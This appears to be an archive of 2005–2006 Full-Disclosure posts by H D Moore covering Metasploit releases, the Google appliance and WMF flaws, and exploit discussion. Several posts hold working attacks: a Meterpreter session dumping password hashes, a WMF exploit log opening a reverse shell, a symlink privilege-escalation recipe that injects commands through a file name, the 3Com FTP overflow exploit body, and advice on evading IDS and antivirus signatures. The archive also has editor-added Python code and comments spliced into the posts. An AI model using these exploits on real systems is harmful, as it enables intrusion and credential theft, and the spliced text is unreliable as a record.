[Full-disclosure] Metasploit Framework v2.5

2005-10-18 Thread H D Moore
The Metasploit Framework is an advanced open-source exploit
development platform. The 2.5 release includes three user interfaces,
105 exploits and 75 payloads.

The Framework will run on any modern operating system that has a working
Perl interpreter. The Windows installer includes a slimmed-down version
of the Cygwin environment.

This is a maintenance release - all updates to 2.4 have been rolled into
2.5, along with some new exploits and minor features.
  
This release is available from the Metasploit.com web site:
  - Unix:  http://metasploit.com/tools/framework-2.5.tar.gz
  - Win32: http://metasploit.com/tools/framework-2.5.exe

A demonstration of the msfweb interface is running live from:
  - http://metasploit.com:5/
 
Information about version 3.0 has been posted online:
  - http://metasploit.com/projects/Framework/msf3/
  
Exploit modules designed for the 2.2 through 2.4 releases should maintain
compatibility with 2.5. If you run into any problems using older
modules with this release, please let us know.

The Framework development team consists of a few active members and
over a dozen contributors. Check out the donations web page for a complete
list of contributors:
 - http://metasploit.com/donate.html

You can subscribe to the Metasploit Framework mailing list by sending a
blank email to framework-subscribe[at]metasploit.com. This is the
preferred way to submit bugs, suggest new features, and discuss the
Framework with other users.

If you would like to contact us directly, please email us at:
msfdev[at]metasploit.com.

For more information about the Framework and this release in general,
please refer to the online documentation, particularly the User Guide:
  - http://metasploit.com/projects/Framework/documentation.html


Enjoy!

- The Metasploit Framework Development Team
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Snort BackOrifice Fun

2005-10-19 Thread H D Moore
Attached some in-progress code for the snort bug, getting through the 
while() loop that modifies both 'i' and 'len' is annoying. Any ideas on 
making this more reliable? It works great on my -ggdb version , but runs 
off a page during a memcmp() on my normal binary.

-HD


snort_bo_ping.pm
Description: application/perl-module

Re: [Full-disclosure] SEC-Consult SA 20051025-1 :: RSA ACE Web Agent XSS

2005-10-25 Thread H D Moore
I believe 5.2 and 5.3 are vulnerable as well, there are other fun bugs 
hiding in there too :) Filemon rocks.

-HD

On Tuesday 25 October 2005 15:26, Bernhard Mueller wrote:
> This flaw was discovered in version 5.1 of RSA Agent for Web. No other
> versions were available for testing. Web Agents >5.1 may also be
> vulnerable.


[Full-disclosure] Google Search Appliance proxystylesheet Flaws

2005-11-20 Thread H D Moore
This document can be found online at:
 - http://metasploit.com/research/vulns/google_proxystylesheet/

Title:
Google Search Appliance proxystylesheet Flaws

Release Date:
November 21, 2005

Patch Date:
August 16, 2005

Reported Date:
June 10, 2005

Vendor:
Google

Systems Affected:
Google Mini Search Appliance (confirmed)
Google Search Appliance (possible)

Summary:
The Google Search Appliance allows customization of the search interface 
through XSLT style sheets. Certain versions of the appliance allow a 
remote URL to be supplied as the path to the XSLT style sheet. This 
feature can be abused to perform cross-site scripting (XSS), file 
discovery, service enumeration, and arbitrary command execution.

Vendor Status:
Google has released a patch and advisory (GA-2005-08-m, to clients only).

Exploit Availability:
A Metasploit Framework module has been developed for the XSLT Java Code 
Execution flaw: google_proxystylesheet_exec.
No code is required to exploit the other flaws.

Researcher(s):
H D Moore (hdm[at]metasploit.com)

Vulnerability Details:
The Google Search Appliance search interface uses the 'proxystylesheet' 
form variable to determine what style sheet to apply to the search 
results. This variable can be a local file name or a HTTP URL.

Error Message XSS
A cross-site scripting flaw can be exploited by providing a snippet of 
malicious Javascript code for the proxystylesheet variable. The appliance 
will look for a local file by that name and then display an error message 
containing the Javascript code.

File Existence Verification
It is possible to determine the existence of any file on the system by 
using a relative path from the style sheet directory. The error message 
returned from the server will disclose whether or not a valid path was 
provided. This can be used to fingerprint the base operating system and 
kernel version.

Service Discovery
A rudimentary port scan can be performed by requesting HTTP URLs that 
point to a target system and individual ports on that system. The error 
message returned from the server will differ between open and closed 
ports. The appliance will ignore requests to connect back to itself, but 
no other restrictions apply.

XSLT Style Sheet XSS
A cross-site scripting flaw can be exploited by creating a malicious XSLT 
style sheet and specifying the URL to this style sheet in the 
proxystylesheet parameter. The appliance will download the style sheet 
and present the malicious Javascript to the user who executed the search.

XSLT Java Code Execution
It is possible to execute arbitrary Java class methods on the appliance by 
creating a malicious XSLT style sheet. System commands can be executed as 
an unprivileged user, which combined with the vulnerable kernel version, 
can lead to a remote root shell. The appliance uses the Saxon XSLT 
parser, which allows the following snippet to work:

XSLT Version:
XSLT Vendor:
XSLT URL:
OS:
Version:
Arch:
UserName:
UserHome:
UserDir:
Executing command...


Notes:
The Google security team responded immediately to our report and were 
generally very helpful throughout the disclosure process. After a fix was 
developed, they offered to send us a Mini to verify that all issues had 
been addressed. Prior to shipping the appliance, they asked for an NDA 
and a license agreement to be signed and sent back. The NDA and license 
agreement both included clauses that restricted reverse engineering and 
other facets of security research. The NDA prohibited the publication of 
any information deemed confidential by Google without a prior written 
agreement. For any use other than security research, these conditions 
would not be an issue, however as they were written, any vulnerabilities 
discovered after the documents were signed could be considered 
confidential and restricted. We declined to sign the documents and Google 
placed a demo unit online for verification instead.

Humor:
This was found on Google Answers by Jericho: "No. The Google Search 
Appliance does not create security issues. All Google Search Appliance 
services are behind an internal firewall, protecting it from security 
intrusions. In addition, the Google Search Appliance has been thoroughly 
tested to guard against security risks. " ;-) 

References:
http://osvdb.org/20977
http://osvdb.org/20978
http://osvdb.org/20979
http://osvdb.org/20980
http://osvdb.org/20981
http://www.google.com/support/gsa/bin/answer.py?answer=15857
http://www.osvdb.org/blog/


Re: [Full-disclosure] Webmin miniserv.pl format string vulnerability

2005-11-29 Thread H D Moore
On Tuesday 29 November 2005 04:07, [EMAIL PROTECTED] wrote:
> [snip ] so so if remote code execution is successful, it would
> lead to a full remote root compromise in a standard configuration. 

> DESCRIPTION.  The username parameter of the login form is logged via
> the perl `syslog' facility in an unsafe manner during an unknown user
> login attempt. the perl syslog facility passes the username on to the
> variable argument function sprintf that will treat any format
> specifiers and process them accordingly.
>
> DETAILS.  The vectors for a simple DoS of the web server are to use the
> %n and %0(large number)d inside of the username parameter, with the
> former causing a write protection fault within perl leading to script
> abortion, and the latter causing a large amount of memory to be
> allocated inside of the perl process.

Sys::Syslog calls sprintf($format, @_). I tried testing this on perl 5.8.7 
and don't see how this can be exploitable.  The %n specifier results in 
the following error message:

$ perl -e 'sprintf("%n")'
Modification of a read-only value attempted at -e line 1.

Using a thousand %p's results in the same address (presumably of the 
temporary char *) over and over again.

It is possible to memory starve webmin with a long %99d string, 
but arbitrary memory writes seem to be out of the question.

What version of perl was used by the third-party to exploit this?

-HD


Re: [Full-disclosure] Webmin miniserv.pl format string vulnerability

2005-12-01 Thread H D Moore
As many folks have pointed out and consistent with the recent Dyad 
advisory, these bugs are indeed exploitable. I only mention this because 
a reporter quoted someone who quoted my original message and then used it 
to downplay the severity of the problem. 

$ perl -e 'printf("%2918905856\$vs")'

-HD


On Tuesday 29 November 2005 11:15, H D Moore wrote:
> On Tuesday 29 November 2005 04:07, [EMAIL PROTECTED] wrote:
> > [snip ] so so if remote code execution is successful, it would
> > lead to a full remote root compromise in a standard configuration.


[Full-disclosure] Rogue Network Link Detection

2005-12-05 Thread H D Moore
I found an old document and some crappy perl code on my system, figured 
someone might find it interesting:

"Unauthorized network links are one of the biggest problems facing large 
enterprise networks. Users intent on bypassing corporate proxies will 
often use cable modems, wireless networks, or even full-fledged T1s to 
access the internet. These network links can have a drastic effect on 
organizational security; any perimeter access controls are completely 
bypassed, making it nearly impossible for the administrators to 
effectively concentrate their monitoring and intrusion prevention 
efforts. This document attempts to describe different approaches and 
techniques that can be used to detect these rogue network links."

http://metasploit.com/research/misc/rogue_network/

-HD


[Full-disclosure] PGP Wipe Free Space, Lyris ListManager Flaws, Windows Timestamps, Sam Juicer

2005-12-08 Thread H D Moore
The Metasploit Project has released three new vulnerability sets and a 
password dumping extension to the Meterpreter payload. Enjoy!

-HD

[ PGP Desktop Wipe Free Space Flaw ]

PGP Desktop includes a Wipe Free Space utility that claims to eliminate 
data in all the free space on your hard drive including the little 
areas after the end of existing files which may still have old data left 
behind. In short, the utility claims to wipe file slack space, the unused 
space in a disk cluster. The software does not work as advertised. It 
does not clean slack space.
- http://metasploit.com/research/vulns/pgp_slackspace/


[ Lyris ListManager Multiple Flaws ]

The Lyris ListManager software is vulnerable to numerous SQL injection, 
source code disclosure, and authentication bypass flaws. The ListManager 
software runs on Linux, Solaris, and Windows and can be configured to use 
one of the following database backends: PostgreSQL, Oracle, and 
MSSQL/MSDE. These flaws can be used to gain complete access to the 
ListManager data and often the host server itself.
- http://metasploit.com/research/vulns/lyris_listmanager/


[ Windows File Time Stamp Display Flaw ]

Windows file time stamps can be set to extremely low values via the 
NtSetInformationFile() system call. The Windows API does not properly 
translate the low 64-bit time values stored on disk into human readable 
format, and displays no information instead. Although this is not a 
security vulnerability in itself, it adversely affects third-party 
applications that rely upon the Windows API to perform the translation.
- http://metasploit.com/research/vulns/windows_timestamp/

[ Sam Juicer ]

A new extension has been added to the Meterpreter uber-payload in the 
Metasploit Framework. This extension allows you to dump the local Windows 
password hashes from a Meterpreter shell. The password dump is 
accomplished without writing any files to disk, as opposed to any version 
of pwdump available today. The Sam Juicer extension can be obtained via 
'msfupdate' or by downloading the latest snapshot of v2.5 of the 
Metasploit Framework. After successfully exploiting a system with one of 
the 'meterpreter' payloads, run the following commands to load the 
extension and dump the password hashes:

msf lsass_ms04_011(win32_reverse_meterpreter) > exploit
[*] Starting Reverse Handler.
[*] Windows 2000 target
[*] Sending request...
[*] Got connection from 192.168.0.100:4321 <-> 192.168.0.252:1124
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=connected to=- ]
[ -= meterpreter server =- ]
[ -=v.  0500=- ]
meterpreter>

<< load the Sam extension with the 'use' command >>

meterpreter> use -m Sam
loadlib: Loading library from 'ext551353.dll' on the remote machine.
loadlib: success.

<< use the gethashes command to dump the local password hashes >>

meterpreter> gethashes
Administrator:500:ec6r3a5c0k6mce249053939542f2c6c4:cp6wan5tahdibs94e89e2ffb49f307fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[ snip ]


[Full-disclosure] McAfee VirusScan vs Metasploit Framework v2.x

2005-12-09 Thread H D Moore
Hi everyone,

Looks like some overzealous idiot at McAfee added "Trojan" signatures for 
202 files in the latest version of the Metasploit Framework. If you use 
the Framework for your job and have a McAfee support contract, *please* 
call them and let them know that their product is incorrectly tagging a 
standard security tool as a "Trojan" and that this is interfering with 
your ability to conduct business. 

Business customers in the USA can contact McAfee Technical Support by 
phone at 1-800-338-8754 or online at the following URL:
- http://www.mcafee.com/us/support/technical_support/

Home users seem to be out of luck for phone support, but can contact 
McAfee through the TS portal:
- http://ts.mcafeehelp.com/?siteID=1

Thanks!

-HD


Re: [Full-disclosure] Symlink attack techniques

2005-12-14 Thread H D Moore
Assuming that the find command will report a directory or file that you 
control, you can use the symlink to overwrite a shell script, and then 
place shell commands into your file name:

$ mkdir \`cd\..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ ..\;cd\ tmp\;sh\ root.sh\`
$ echo id > /tmp/root.sh
$ chmod +x /tmp/root.sh

$ ln -s /etc/profile /tmp/report

# find / [args]  > /tmp/report
# su - (executes /etc/profile)
/tmp/report: line 1: cd..: command not found
/tmp/report: line 1: ./uid=0(root): No such file or directory

Some potential shell scripts include /etc/profile, /etc/cron.*/*, and 
/etc/profiles.d/*.

-HD

On Wednesday 14 December 2005 16:42, Werner Schalk wrote:
> On a Unix system there is a cronjob set up which will use the find
> command to create some sort of report and output that report to a
> predictable file in /tmp. So basically the command in the crontab is
> something like:
>
> 15 4  * * 6 root/usr/bin/find [command] > /tmp/report.txt


[Full-disclosure] Metasploit Framework v3.0 Alpha Release 1

2005-12-14 Thread H D Moore
The Metasploit staff is proud to present the first alpha release of the 
3.0 branch of the Metasploit Framework. This release marks a major 
milestone in the evolution of the Metasploit Framework and is based on a 
complete rewrite of the 2.x series.

The 3.0 branch is designed to provide automation capabilities at every 
stage of the discovery and exploitation process. Nearly every component 
of the framework can be extended, hooked, and automated, allowing for 
streamlined penetration testing and tight integration with third-party 
products. Unlike the 2.0 series, the 3.0 branch is written in Ruby, an 
object-oriented, interpreted scripting language, that has drastically 
simplified the implementation of the framework.

This release includes 44 exploits, 76 payloads, 7 encoders, 2 nops, and 2 
recon modules. The supported platforms are Linux , Mac OS X, and most 
BSDs. The framework requires version 1.8.1 or newer of the Ruby 
interpreter. Windows is not supported at this time, either through Cygwin 
or the native build. Mac OS X users will need to install Ruby from source 
(or an OSS package manager) due to a build error in the version of Ruby 
supplied with Mac OS 10.4.

The latest 3.0 code, developer documentation, and general information can 
be found online at the following location:
 - http://metasploit.com/projects/Framework/msf3/

This is an *alpha release*, expect things to break, crash, and generally 
not work very well. This version is being released to gather feedback 
from the community and to weed out the major bugs before entering the 
true beta period. There are many features that have not been completely 
implemented at this point and there are still some edges that will need 
to be smoothed out prior to the final release. A few major features are 
not implemented, including msfweb's exploit mode, some levels of session 
interaction, and the more user-friendly scripting APIs.

Bugs can be submitted to msfdev[at]metasploit.com, or by subscribing to 
the framework-beta mailing list. To subscribe, send a blank email to 
framework-beta-subscribe[at]metasploit.com.

To demonstrate how the 3.0 branch has simplified exploit development, 
check out the following code sample, which provides the exploit body for 
the 3Com 3CDaemon 2.0 FTP Username Overflow (3cdaemon_ftp_user.rb):

---
connect
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_english(2048, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[229, seh.length] = seh
send_cmd( ['USER', buf] , false )
disconnect
handler
---

This release includes many new features that are not present in the 2.x 
series. The highlights are presented below:

[ The Metasploit Console Interface ]

The msfconsole interface in version 3.0 is similar to the 2.x series, 
however the available command set and interaction options have been 
dramatically extended.

* Backgrounded exploits -- It's now possible to execute an exploit in the 
background. This means you can have an exploit that triggers a passive 
vulnerability (such as a browser bug, a sniffer exploit, etc) while 
performing other tasks. Each successful exploit attempt will show up in 
the list of active sessions, any of which can be accessed at any time.

* Multi-session exploits -- Unlike the 2.x series, the 3.0 branch is 
capable of creating multiple sessions from a single exploit. This is 
especially useful in the context of passive exploits that can have 
multiple clients connecting.

* Multiple concurrent sessions -- It is possible to have more than one 
active session established. An active session can be sent to the background 
through the ^Z sequence.

* IRB mode -- The console interface supports dropping into a Ruby 
scripting interface that allows direct interaction with the framework 
instance. This makes it possible to do low-level interaction with 
sessions and framework modules.

[ The Meterpreter Payload ]

The Meterpreter payload has been extended and refined for the 3.0 branch. 
The underlying architecture and design remains the same, but the feature 
set and interface has been greatly enhanced to not only make scripting 
the post-exploitation process possible but to also increase the level of 
functionality. Instead of having separate modules for each of the major 
subsystems (Fs, Process, Net, Sys), the 3.0 Meterpreter has merged all of 
these common elements into one extension called Stdapi (short for the 
Standard API). This API provides access to the file system, registry, 
network, threads, processes, user interface, and much more. Some of the 
cooler features of the new version of Meterpreter include:

* In-memory process migration -- This feature makes it possible to migrate 
the Meterpreter server instance to a completely different process, such 
as a system service like lsass.exe, without having to establish a new 
connection. Migrating to a privileged process has the added benefit of 
making the server impossible to kill without taking d

Re: [Full-disclosure] iDEFENSE Security Advisory 12.06.05: Ipswitch

2005-12-16 Thread H D Moore
This may not be a limitation if you can use the argument-skipping syntax 
in msvcrt (ie. %4000$x).

-HD

On Friday 16 December 2005 08:32, FistFucker wrote:
> I don't think it's exploitable because the user controlled string is
> many thousand bytes away from the stack pointer and you can only send 512
> bytes to the SMTP daemon.
[snip]
> If someone was able to exploit this, I would be interested in exploit
> code or an explanation to learn from him.


[Full-disclosure] Someone wasted a nice bug on spyware...

2005-12-27 Thread H D Moore
In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to 
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\\Desktop>  


On Tuesday 27 December 2005 14:20, [EMAIL PROTECTED] wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.


Re: [Full-disclosure] Someone wasted a nice bug on spyware...

2005-12-28 Thread H D Moore
On Wednesday 28 December 2005 19:16, Nick FitzGerald wrote:
> The fact it was used for installing spyware (and may have been so for
> near on two weeks now) simply shows you where the money is these days.

It's a sad state of affairs when $19.95 crapware scams make more money than 
cleaning out a few bank/egold/epoker accounts.

Since WMF/EMF is basically raw access to the GDI API, expect to see quite 
a few of these bugs. For the curious:

- http://msdn.microsoft.com/library/en-us/gdi/metafile_250z.asp

For anyone using the Metasploit module (aka crappy wrapper around the 
original file), keep in mind that for the exploit to work, you need to 
request a path from the attacking system path ending in .wmf (or .tiff, 
or .emf, or ...). The exploit has been tested against non-english 
versions of Windows as well (Polish, Spanish, a few others) and works 
just fine as long as DEP is turned off.

-HD


[Full-disclosure] WMF: New Metasploit Framework Module

2005-12-30 Thread H D Moore
We just released a new version of the Metasploit Framework exploit module 
for the Escape/SetAbortFunc code execution flaw. This module now pads the 
Escape() call with random WMF records. You may want to double check your 
IDS signatures -- most of the ones I saw today could be easily bypassed 
or will false positive on valid graphic files.

Available via msfupdate, the 2.5 snapshot, or straight from the web site:
http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile

-HD


Re: [Full-disclosure] WMF Exploit

2006-01-04 Thread H D Moore
From my experience on XP/2003, IE will only render WMF files as images if 
the "placeable" header has been added before the WMF header. The addition 
of the "placeable" header prevents the SetAbortProc from being reached in 
the Escape() function, due to a check on the device context (credits to 
mr. anonymous for that gem, I spent an hour beating my head on it).

I will try to publish an "exploit faq" later tonight, seems to be way too 
much confusion about this flaw...

-HD

On Wednesday 04 January 2006 17:27, Crist J. Clark wrote:
> IE 6 displayed WMF files on a test Win98 system just fine for
> me.
>
> Remember, just because when you double-click on a WMF file
> Windows Explorer doesn't know what to do with it does NOT mean
> that when presented to IE in an  tag, it won't. Even trying
> to open the file with IE doesn't mean anything. You need to
> try it in a webpage.


[Full-disclosure] Exploiting WMF (tiny) FAQ

2006-01-05 Thread H D Moore
Q) Why did you release an IDS and AV evading exploit module so soon after 
the vulnerability was discovered?

A) The vulnerability was being exploited, in the wild, for at least two 
weeks (based on email reports) prior to the original BT post. The WMF 
structure is widely documented. The AV vendors were providing 
less-than-capable signatures for no reason other than that no public code 
was available that demonstrated alternate encodings. The IDS vendors were 
(and some still are) providing signatures that couldn't survive a single 
legal byte change in the WMF header. The release of a "polymorphic" (not) 
exploit forced the vendors to either fix their products or cry 
"irresponsibility" and give up. IPS vendors realized how SOL they are wrt 
to client-side HTTP attacks (so many encodings, so many ways to DoS an 
IPS that tries to decode them).

Q) The Windows Meta File format has a number of optional headers, can any 
of these be used to trigger the arbitrary code execution flaw via 
SetAbortProc?

A) No. The CLP headers (16 bit and 32 bit) cause the Picture and Fax 
Viewer (PFV) and Internet Explorer to throw an error when trying to 
render the image. Internet Explorer will only display an image internally 
if the "placeable" header has been prepended to the bare WMF header. If the 
"placeable" header exists, a device context check will fail during the 
call to Escape() and the SetAbortProc() function is not reached. This 
effectively prevents IE or the PFV from executing the SetAbortProc() call 
when any optional header has been prepended. This may not hold true for 
Explorer's preview and icon view.

Q) What about the Enhanced Meta File format? Does this format allow access 
to the exploitable function?

A) No. The EMF format has a separate API (which may or may not have its 
own problems), but it does not allow access to the WMF Escape() function. 
A WMF file can be delivered with the EMF extension however, which will 
cause it to be processed with the vulnerable API.

Q) Are there any other ways to obtain code execution besides via WMF files 
viewed by PFV or Explorer?

A) Yes. Any application that accepts WMF files and calls PlayMetaFile with 
the supplied data can be exploited. Some of these only recognize WMF 
files with the placeable header, which may prevent the application from 
reaching the SetAbortProc function. There are *many* other places where 
standard (ie. included with the OS) applications call the PlayMetaFile 
function, it's just a matter of figuring out which ones can be used to 
deliver the malicious WMF content. A potential vector includes the 
display of icons stored inside of a standard executable. Viewing these 
files in an Explorer directory listing could result in the execution of 
code in an embedded WMF file. This has yet to be tested.

Q) What WMF header fields are mandatory for code execution through the 
PFV ?

A) Not many. The Windows Meta File header and possible field values are 
listed below:

# Possible values: 1 or 2 (memory or disk) 
WORD FileType

# The HeaderSize must always be 9 
WORD HeaderSize;

# The Version field can be 0x0300 or 0x0100 
WORD Version

# This parameter can be anywhere from 0x20 to 0x 
DWORD FileSize

# Completely arbitrary 
WORD NumOfObjects

# Completely arbitrary 
DWORD MaxRecordSize

# Completely arbitrary 
WORD NumOfParams

The MSB of the actual MetaFileRecord function field is completely ignored.

Credits: A number of anonymous sources contributed to this information.

More information on the WMF structure can be found at the following sites:
- http://wvware.sourceforge.net/caolan/ora-wmf.html
- http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt

-HD
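The FAQ's header layout and its remark that only the low byte of the record function field matters translate directly into detection logic. The following parser is an added example (not code from HD's posts or from Metasploit): it walks WMF records after an optional placeable header, flags Escape/SETABORTPROC records by the low function byte alone, and contrasts that with a naive exact-bytes signature of the kind the FAQ says a single legal byte change defeats. The sample files it builds are constructed here for the test and carry inert filler, not a payload.

```python
import struct

# WMF constants from MS-WMF and the header description in the FAQ above.
PLACEABLE_KEY = 0x9AC6CDD7   # magic DWORD of the optional "placeable" header
PLACEABLE_LEN = 22           # bytes
WMF_HEADER_LEN = 18          # 7 fields: HHHIHIH = 18 bytes
META_ESCAPE = 0x0626         # rdFunction for Escape(); low byte 0x26 is what counts
META_EOF = 0x0000
SETABORTPROC = 0x0009        # Escape sub-function that installs the abort callback


def parse_wmf(data: bytes) -> dict:
    """Walk a WMF file and report every Escape/SETABORTPROC record.

    Returns {'placeable': bool, 'version': int, 'abortproc_records': [offsets]}.
    Raises ValueError when the header or a record is structurally broken.
    """
    off = 0
    placeable = False
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        placeable = True
        off = PLACEABLE_LEN          # skip the 22-byte placeable header
    if len(data) < off + WMF_HEADER_LEN:
        raise ValueError("truncated WMF header")
    (file_type, header_size, version, _file_size_words,
     _num_objects, _max_record, _num_params) = struct.unpack_from("<HHHIHIH", data, off)
    if header_size != 9:             # the one field the FAQ says is fixed
        raise ValueError("HeaderSize must be 9")
    off += WMF_HEADER_LEN

    findings = []
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        if size_words < 3:           # size counts its own 3-WORD record header
            raise ValueError(f"bad record size at offset {off}")
        # The player identifies the GDI function by the low byte only; the
        # high byte is ignored, so a signature keyed on 0x0626 is bypassable.
        if (func & 0xFF) == (META_ESCAPE & 0xFF) and off + 8 <= len(data):
            escape_fn = struct.unpack_from("<H", data, off + 6)[0]
            if escape_fn == SETABORTPROC:
                findings.append(off)
        if (func & 0xFF) == META_EOF:
            break
        off += size_words * 2
    return {"placeable": placeable, "version": version, "abortproc_records": findings}


def is_suspicious(data: bytes) -> bool:
    """True when any Escape/SETABORTPROC record is present."""
    return bool(parse_wmf(data)["abortproc_records"])


def naive_signature(data: bytes) -> bool:
    """Exact-bytes match for rdFunction 0x0626 + escape 0x0009 (little-endian).
    Misses any record whose ignored high function byte differs from 0x06."""
    return b"\x26\x06\x09\x00" in data


def _record(func: int, params: bytes) -> bytes:
    """Encode one metafile record: DWORD size in WORDs, WORD function, params."""
    assert len(params) % 2 == 0
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_sample_wmf(include_abortproc: bool, func_high_byte: int = 0x06,
                     placeable: bool = False) -> bytes:
    """Construct a minimal test file (assumed layout, inert 'AAAA' escape data)."""
    records = b""
    if include_abortproc:
        params = struct.pack("<HH", SETABORTPROC, 4) + b"AAAA"   # EscapeFunction, ByteCount, data
        records += _record((func_high_byte << 8) | 0x26, params)
    records += _record(META_EOF, b"")
    body_words = (WMF_HEADER_LEN + len(records)) // 2
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, body_words, 0, 0, 0)
    out = header + records
    if placeable:
        # Key, HWmf, bounding box (4 x INT16), Inch, Reserved, Checksum (zeroed)
        out = struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0, 0, 0, 100, 100, 96, 0, 0) + out
    return out


if __name__ == "__main__":
    for label, sample in [("plain", build_sample_wmf(True)),
                          ("high byte 0xFF", build_sample_wmf(True, func_high_byte=0xFF)),
                          ("benign", build_sample_wmf(False))]:
        print(f"{label:15s} parser={is_suspicious(sample)} naive={naive_signature(sample)}")
```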



[Full-disclosure] Microsoft patches WMF... Wine is still exploitable?

2006-01-05 Thread H D Moore
---
wine-20050930/dlls/gdi/driver.c
---

/** 
Escape  [EMAIL PROTECTED]
*/
INT WINAPI Escape( HDC hdc, INT escape, INT in_count, LPCSTR in_data, 
LPVOID out_data )
{
INT ret;
POINT *pt;

switch (escape)
{
case ABORTDOC:
return AbortDoc( hdc );
[ snip ]
case SETABORTPROC:
return SetAbortProc( hdc, (ABORTPROC)in_data );
[ snip ]

---
wine-20050930/dlls/gdi/printdrv.c
---

/**
 *           call_abort_proc16
 */
static BOOL CALLBACK call_abort_proc16( HDC hdc, INT code )
{
    ABORTPROC16 proc16;
    DC *dc = DC_GetDCPtr( hdc );

    if (!dc) return FALSE;
    proc16 = dc->pAbortProc16;
    GDI_ReleaseObj( hdc );
    if (proc16)
    {
        WORD args[2];
        DWORD ret;

        args[1] = HDC_16(hdc);
        args[0] = code;
        WOWCallback16Ex( (DWORD)proc16, WCB16_PASCAL, sizeof(args), args, &ret );
        return LOWORD(ret);
    }
    return TRUE;
}


/**
 *           SetAbortProc   (GDI32.@)
 */
INT WINAPI SetAbortProc(HDC hdc, ABORTPROC abrtprc)
{
    DC *dc = DC_GetDCPtr( hdc );

    if (!dc) return FALSE;
    dc->pAbortProc = abrtprc;   /* stored as-is; nothing validates the pointer */
    GDI_ReleaseObj( hdc );
    return TRUE;
}


---
wine-20050930/dlls/gdi/printdrv.c
---

/**
 *           EndPage
 */
INT WINAPI EndPage(HDC hdc)
{
    ABORTPROC abort_proc;
    INT ret = 0;
    DC *dc = DC_GetDCPtr( hdc );
    if(!dc) return SP_ERROR;

    if (dc->funcs->pEndPage) ret = dc->funcs->pEndPage( dc->physDev );
    abort_proc = dc->pAbortProc;
    GDI_ReleaseObj( hdc );
    if (abort_proc && !abort_proc( hdc, 0 ))   /* the stored callback is invoked here */
    {
        EndDoc( hdc );
        ret = 0;
    }
    return ret;
}

-HD


Re: [Full-disclosure] WehnTrust - When you have to trust Wehntrust

2006-01-16 Thread H D Moore
Any chance you contacted Wehnus about it? The "hot fix" is just to open 
regedit, browse to this key, and place the command line quotes. Minor 
problem, but I am sure Matt would have appreciated an email first.

-HD

On Monday 16 January 2006 14:47, Thierry Zoller wrote:
> Dear  List,
>
> Small blurp I came around; when Wehntrust creates the autostart key
> it forgets to correctly quote the string in the key and thus may
> trigger an autostart of c:\program.bat|exe|com upon reboot... [2]
>
> Quoting [1] :
> 
> ---
>--- c:\program files\sub dir\program.exe,
>
> In this case, the system will successively expand the string when
> interpreting the file path, until a module is encountered to execute.
> The string used in the above example would be interpreted as follows:
>
>c:\program.exe
>c:\program files\sub.exe
>c:\program files\sub dir\program.exe
> ---
>--
>
> [1] http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038789.html
> [2] Only a real issue in Windows 2000, WinXP restricted
> users don't have the right to write to c:\
> [3] http://secdev.zoller.lu
> [4] http://www.wehnus.com/
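The expansion order quoted above, turned into an audit check and the quoting fix HD mentions, as an added example that is not part of the thread or of WehnTrust. It assumes the autostart value holds only an image path (no trailing arguments); the candidate paths are the three from the quoted advisory.

```python
import ntpath


def expansion_candidates(command):
    """Paths Windows probes, in order, when resolving an autostart command.

    A quoted command yields exactly one candidate. An unquoted command is
    split at each space and every prefix is tried in turn, with ".exe"
    appended when the prefix has no extension, which is the sequence quoted
    in the thread. Probing stops at the first file that exists, so every
    candidate before the intended one is a location that must not be
    writable by unprivileged users.
    Assumption: the value is an image path only, with no arguments.
    """
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return [command[1:end]] if end > 0 else []
    parts = command.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        cand = " ".join(parts[:i])
        if "." not in ntpath.basename(cand):
            cand += ".exe"
        candidates.append(cand)
    return candidates


def quote_command(command):
    """The hot fix from the thread: wrap the unquoted image path in quotes."""
    command = command.strip()
    if command.startswith('"'):
        return command
    return '"%s"' % command


def audit_autostart(name, command):
    """Return a finding for a value whose path is unquoted and contains spaces, else None."""
    candidates = expansion_candidates(command)
    if len(candidates) <= 1:
        return None
    return {
        "value": name,
        "command": command,
        "probed_before_intended": candidates[:-1],
        "fixed_command": quote_command(command),
    }
```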


Re: [Full-disclosure] Vulnerability/Penetration Testing Tools

2006-01-17 Thread H D Moore
You should check out the Metasploit Framework:
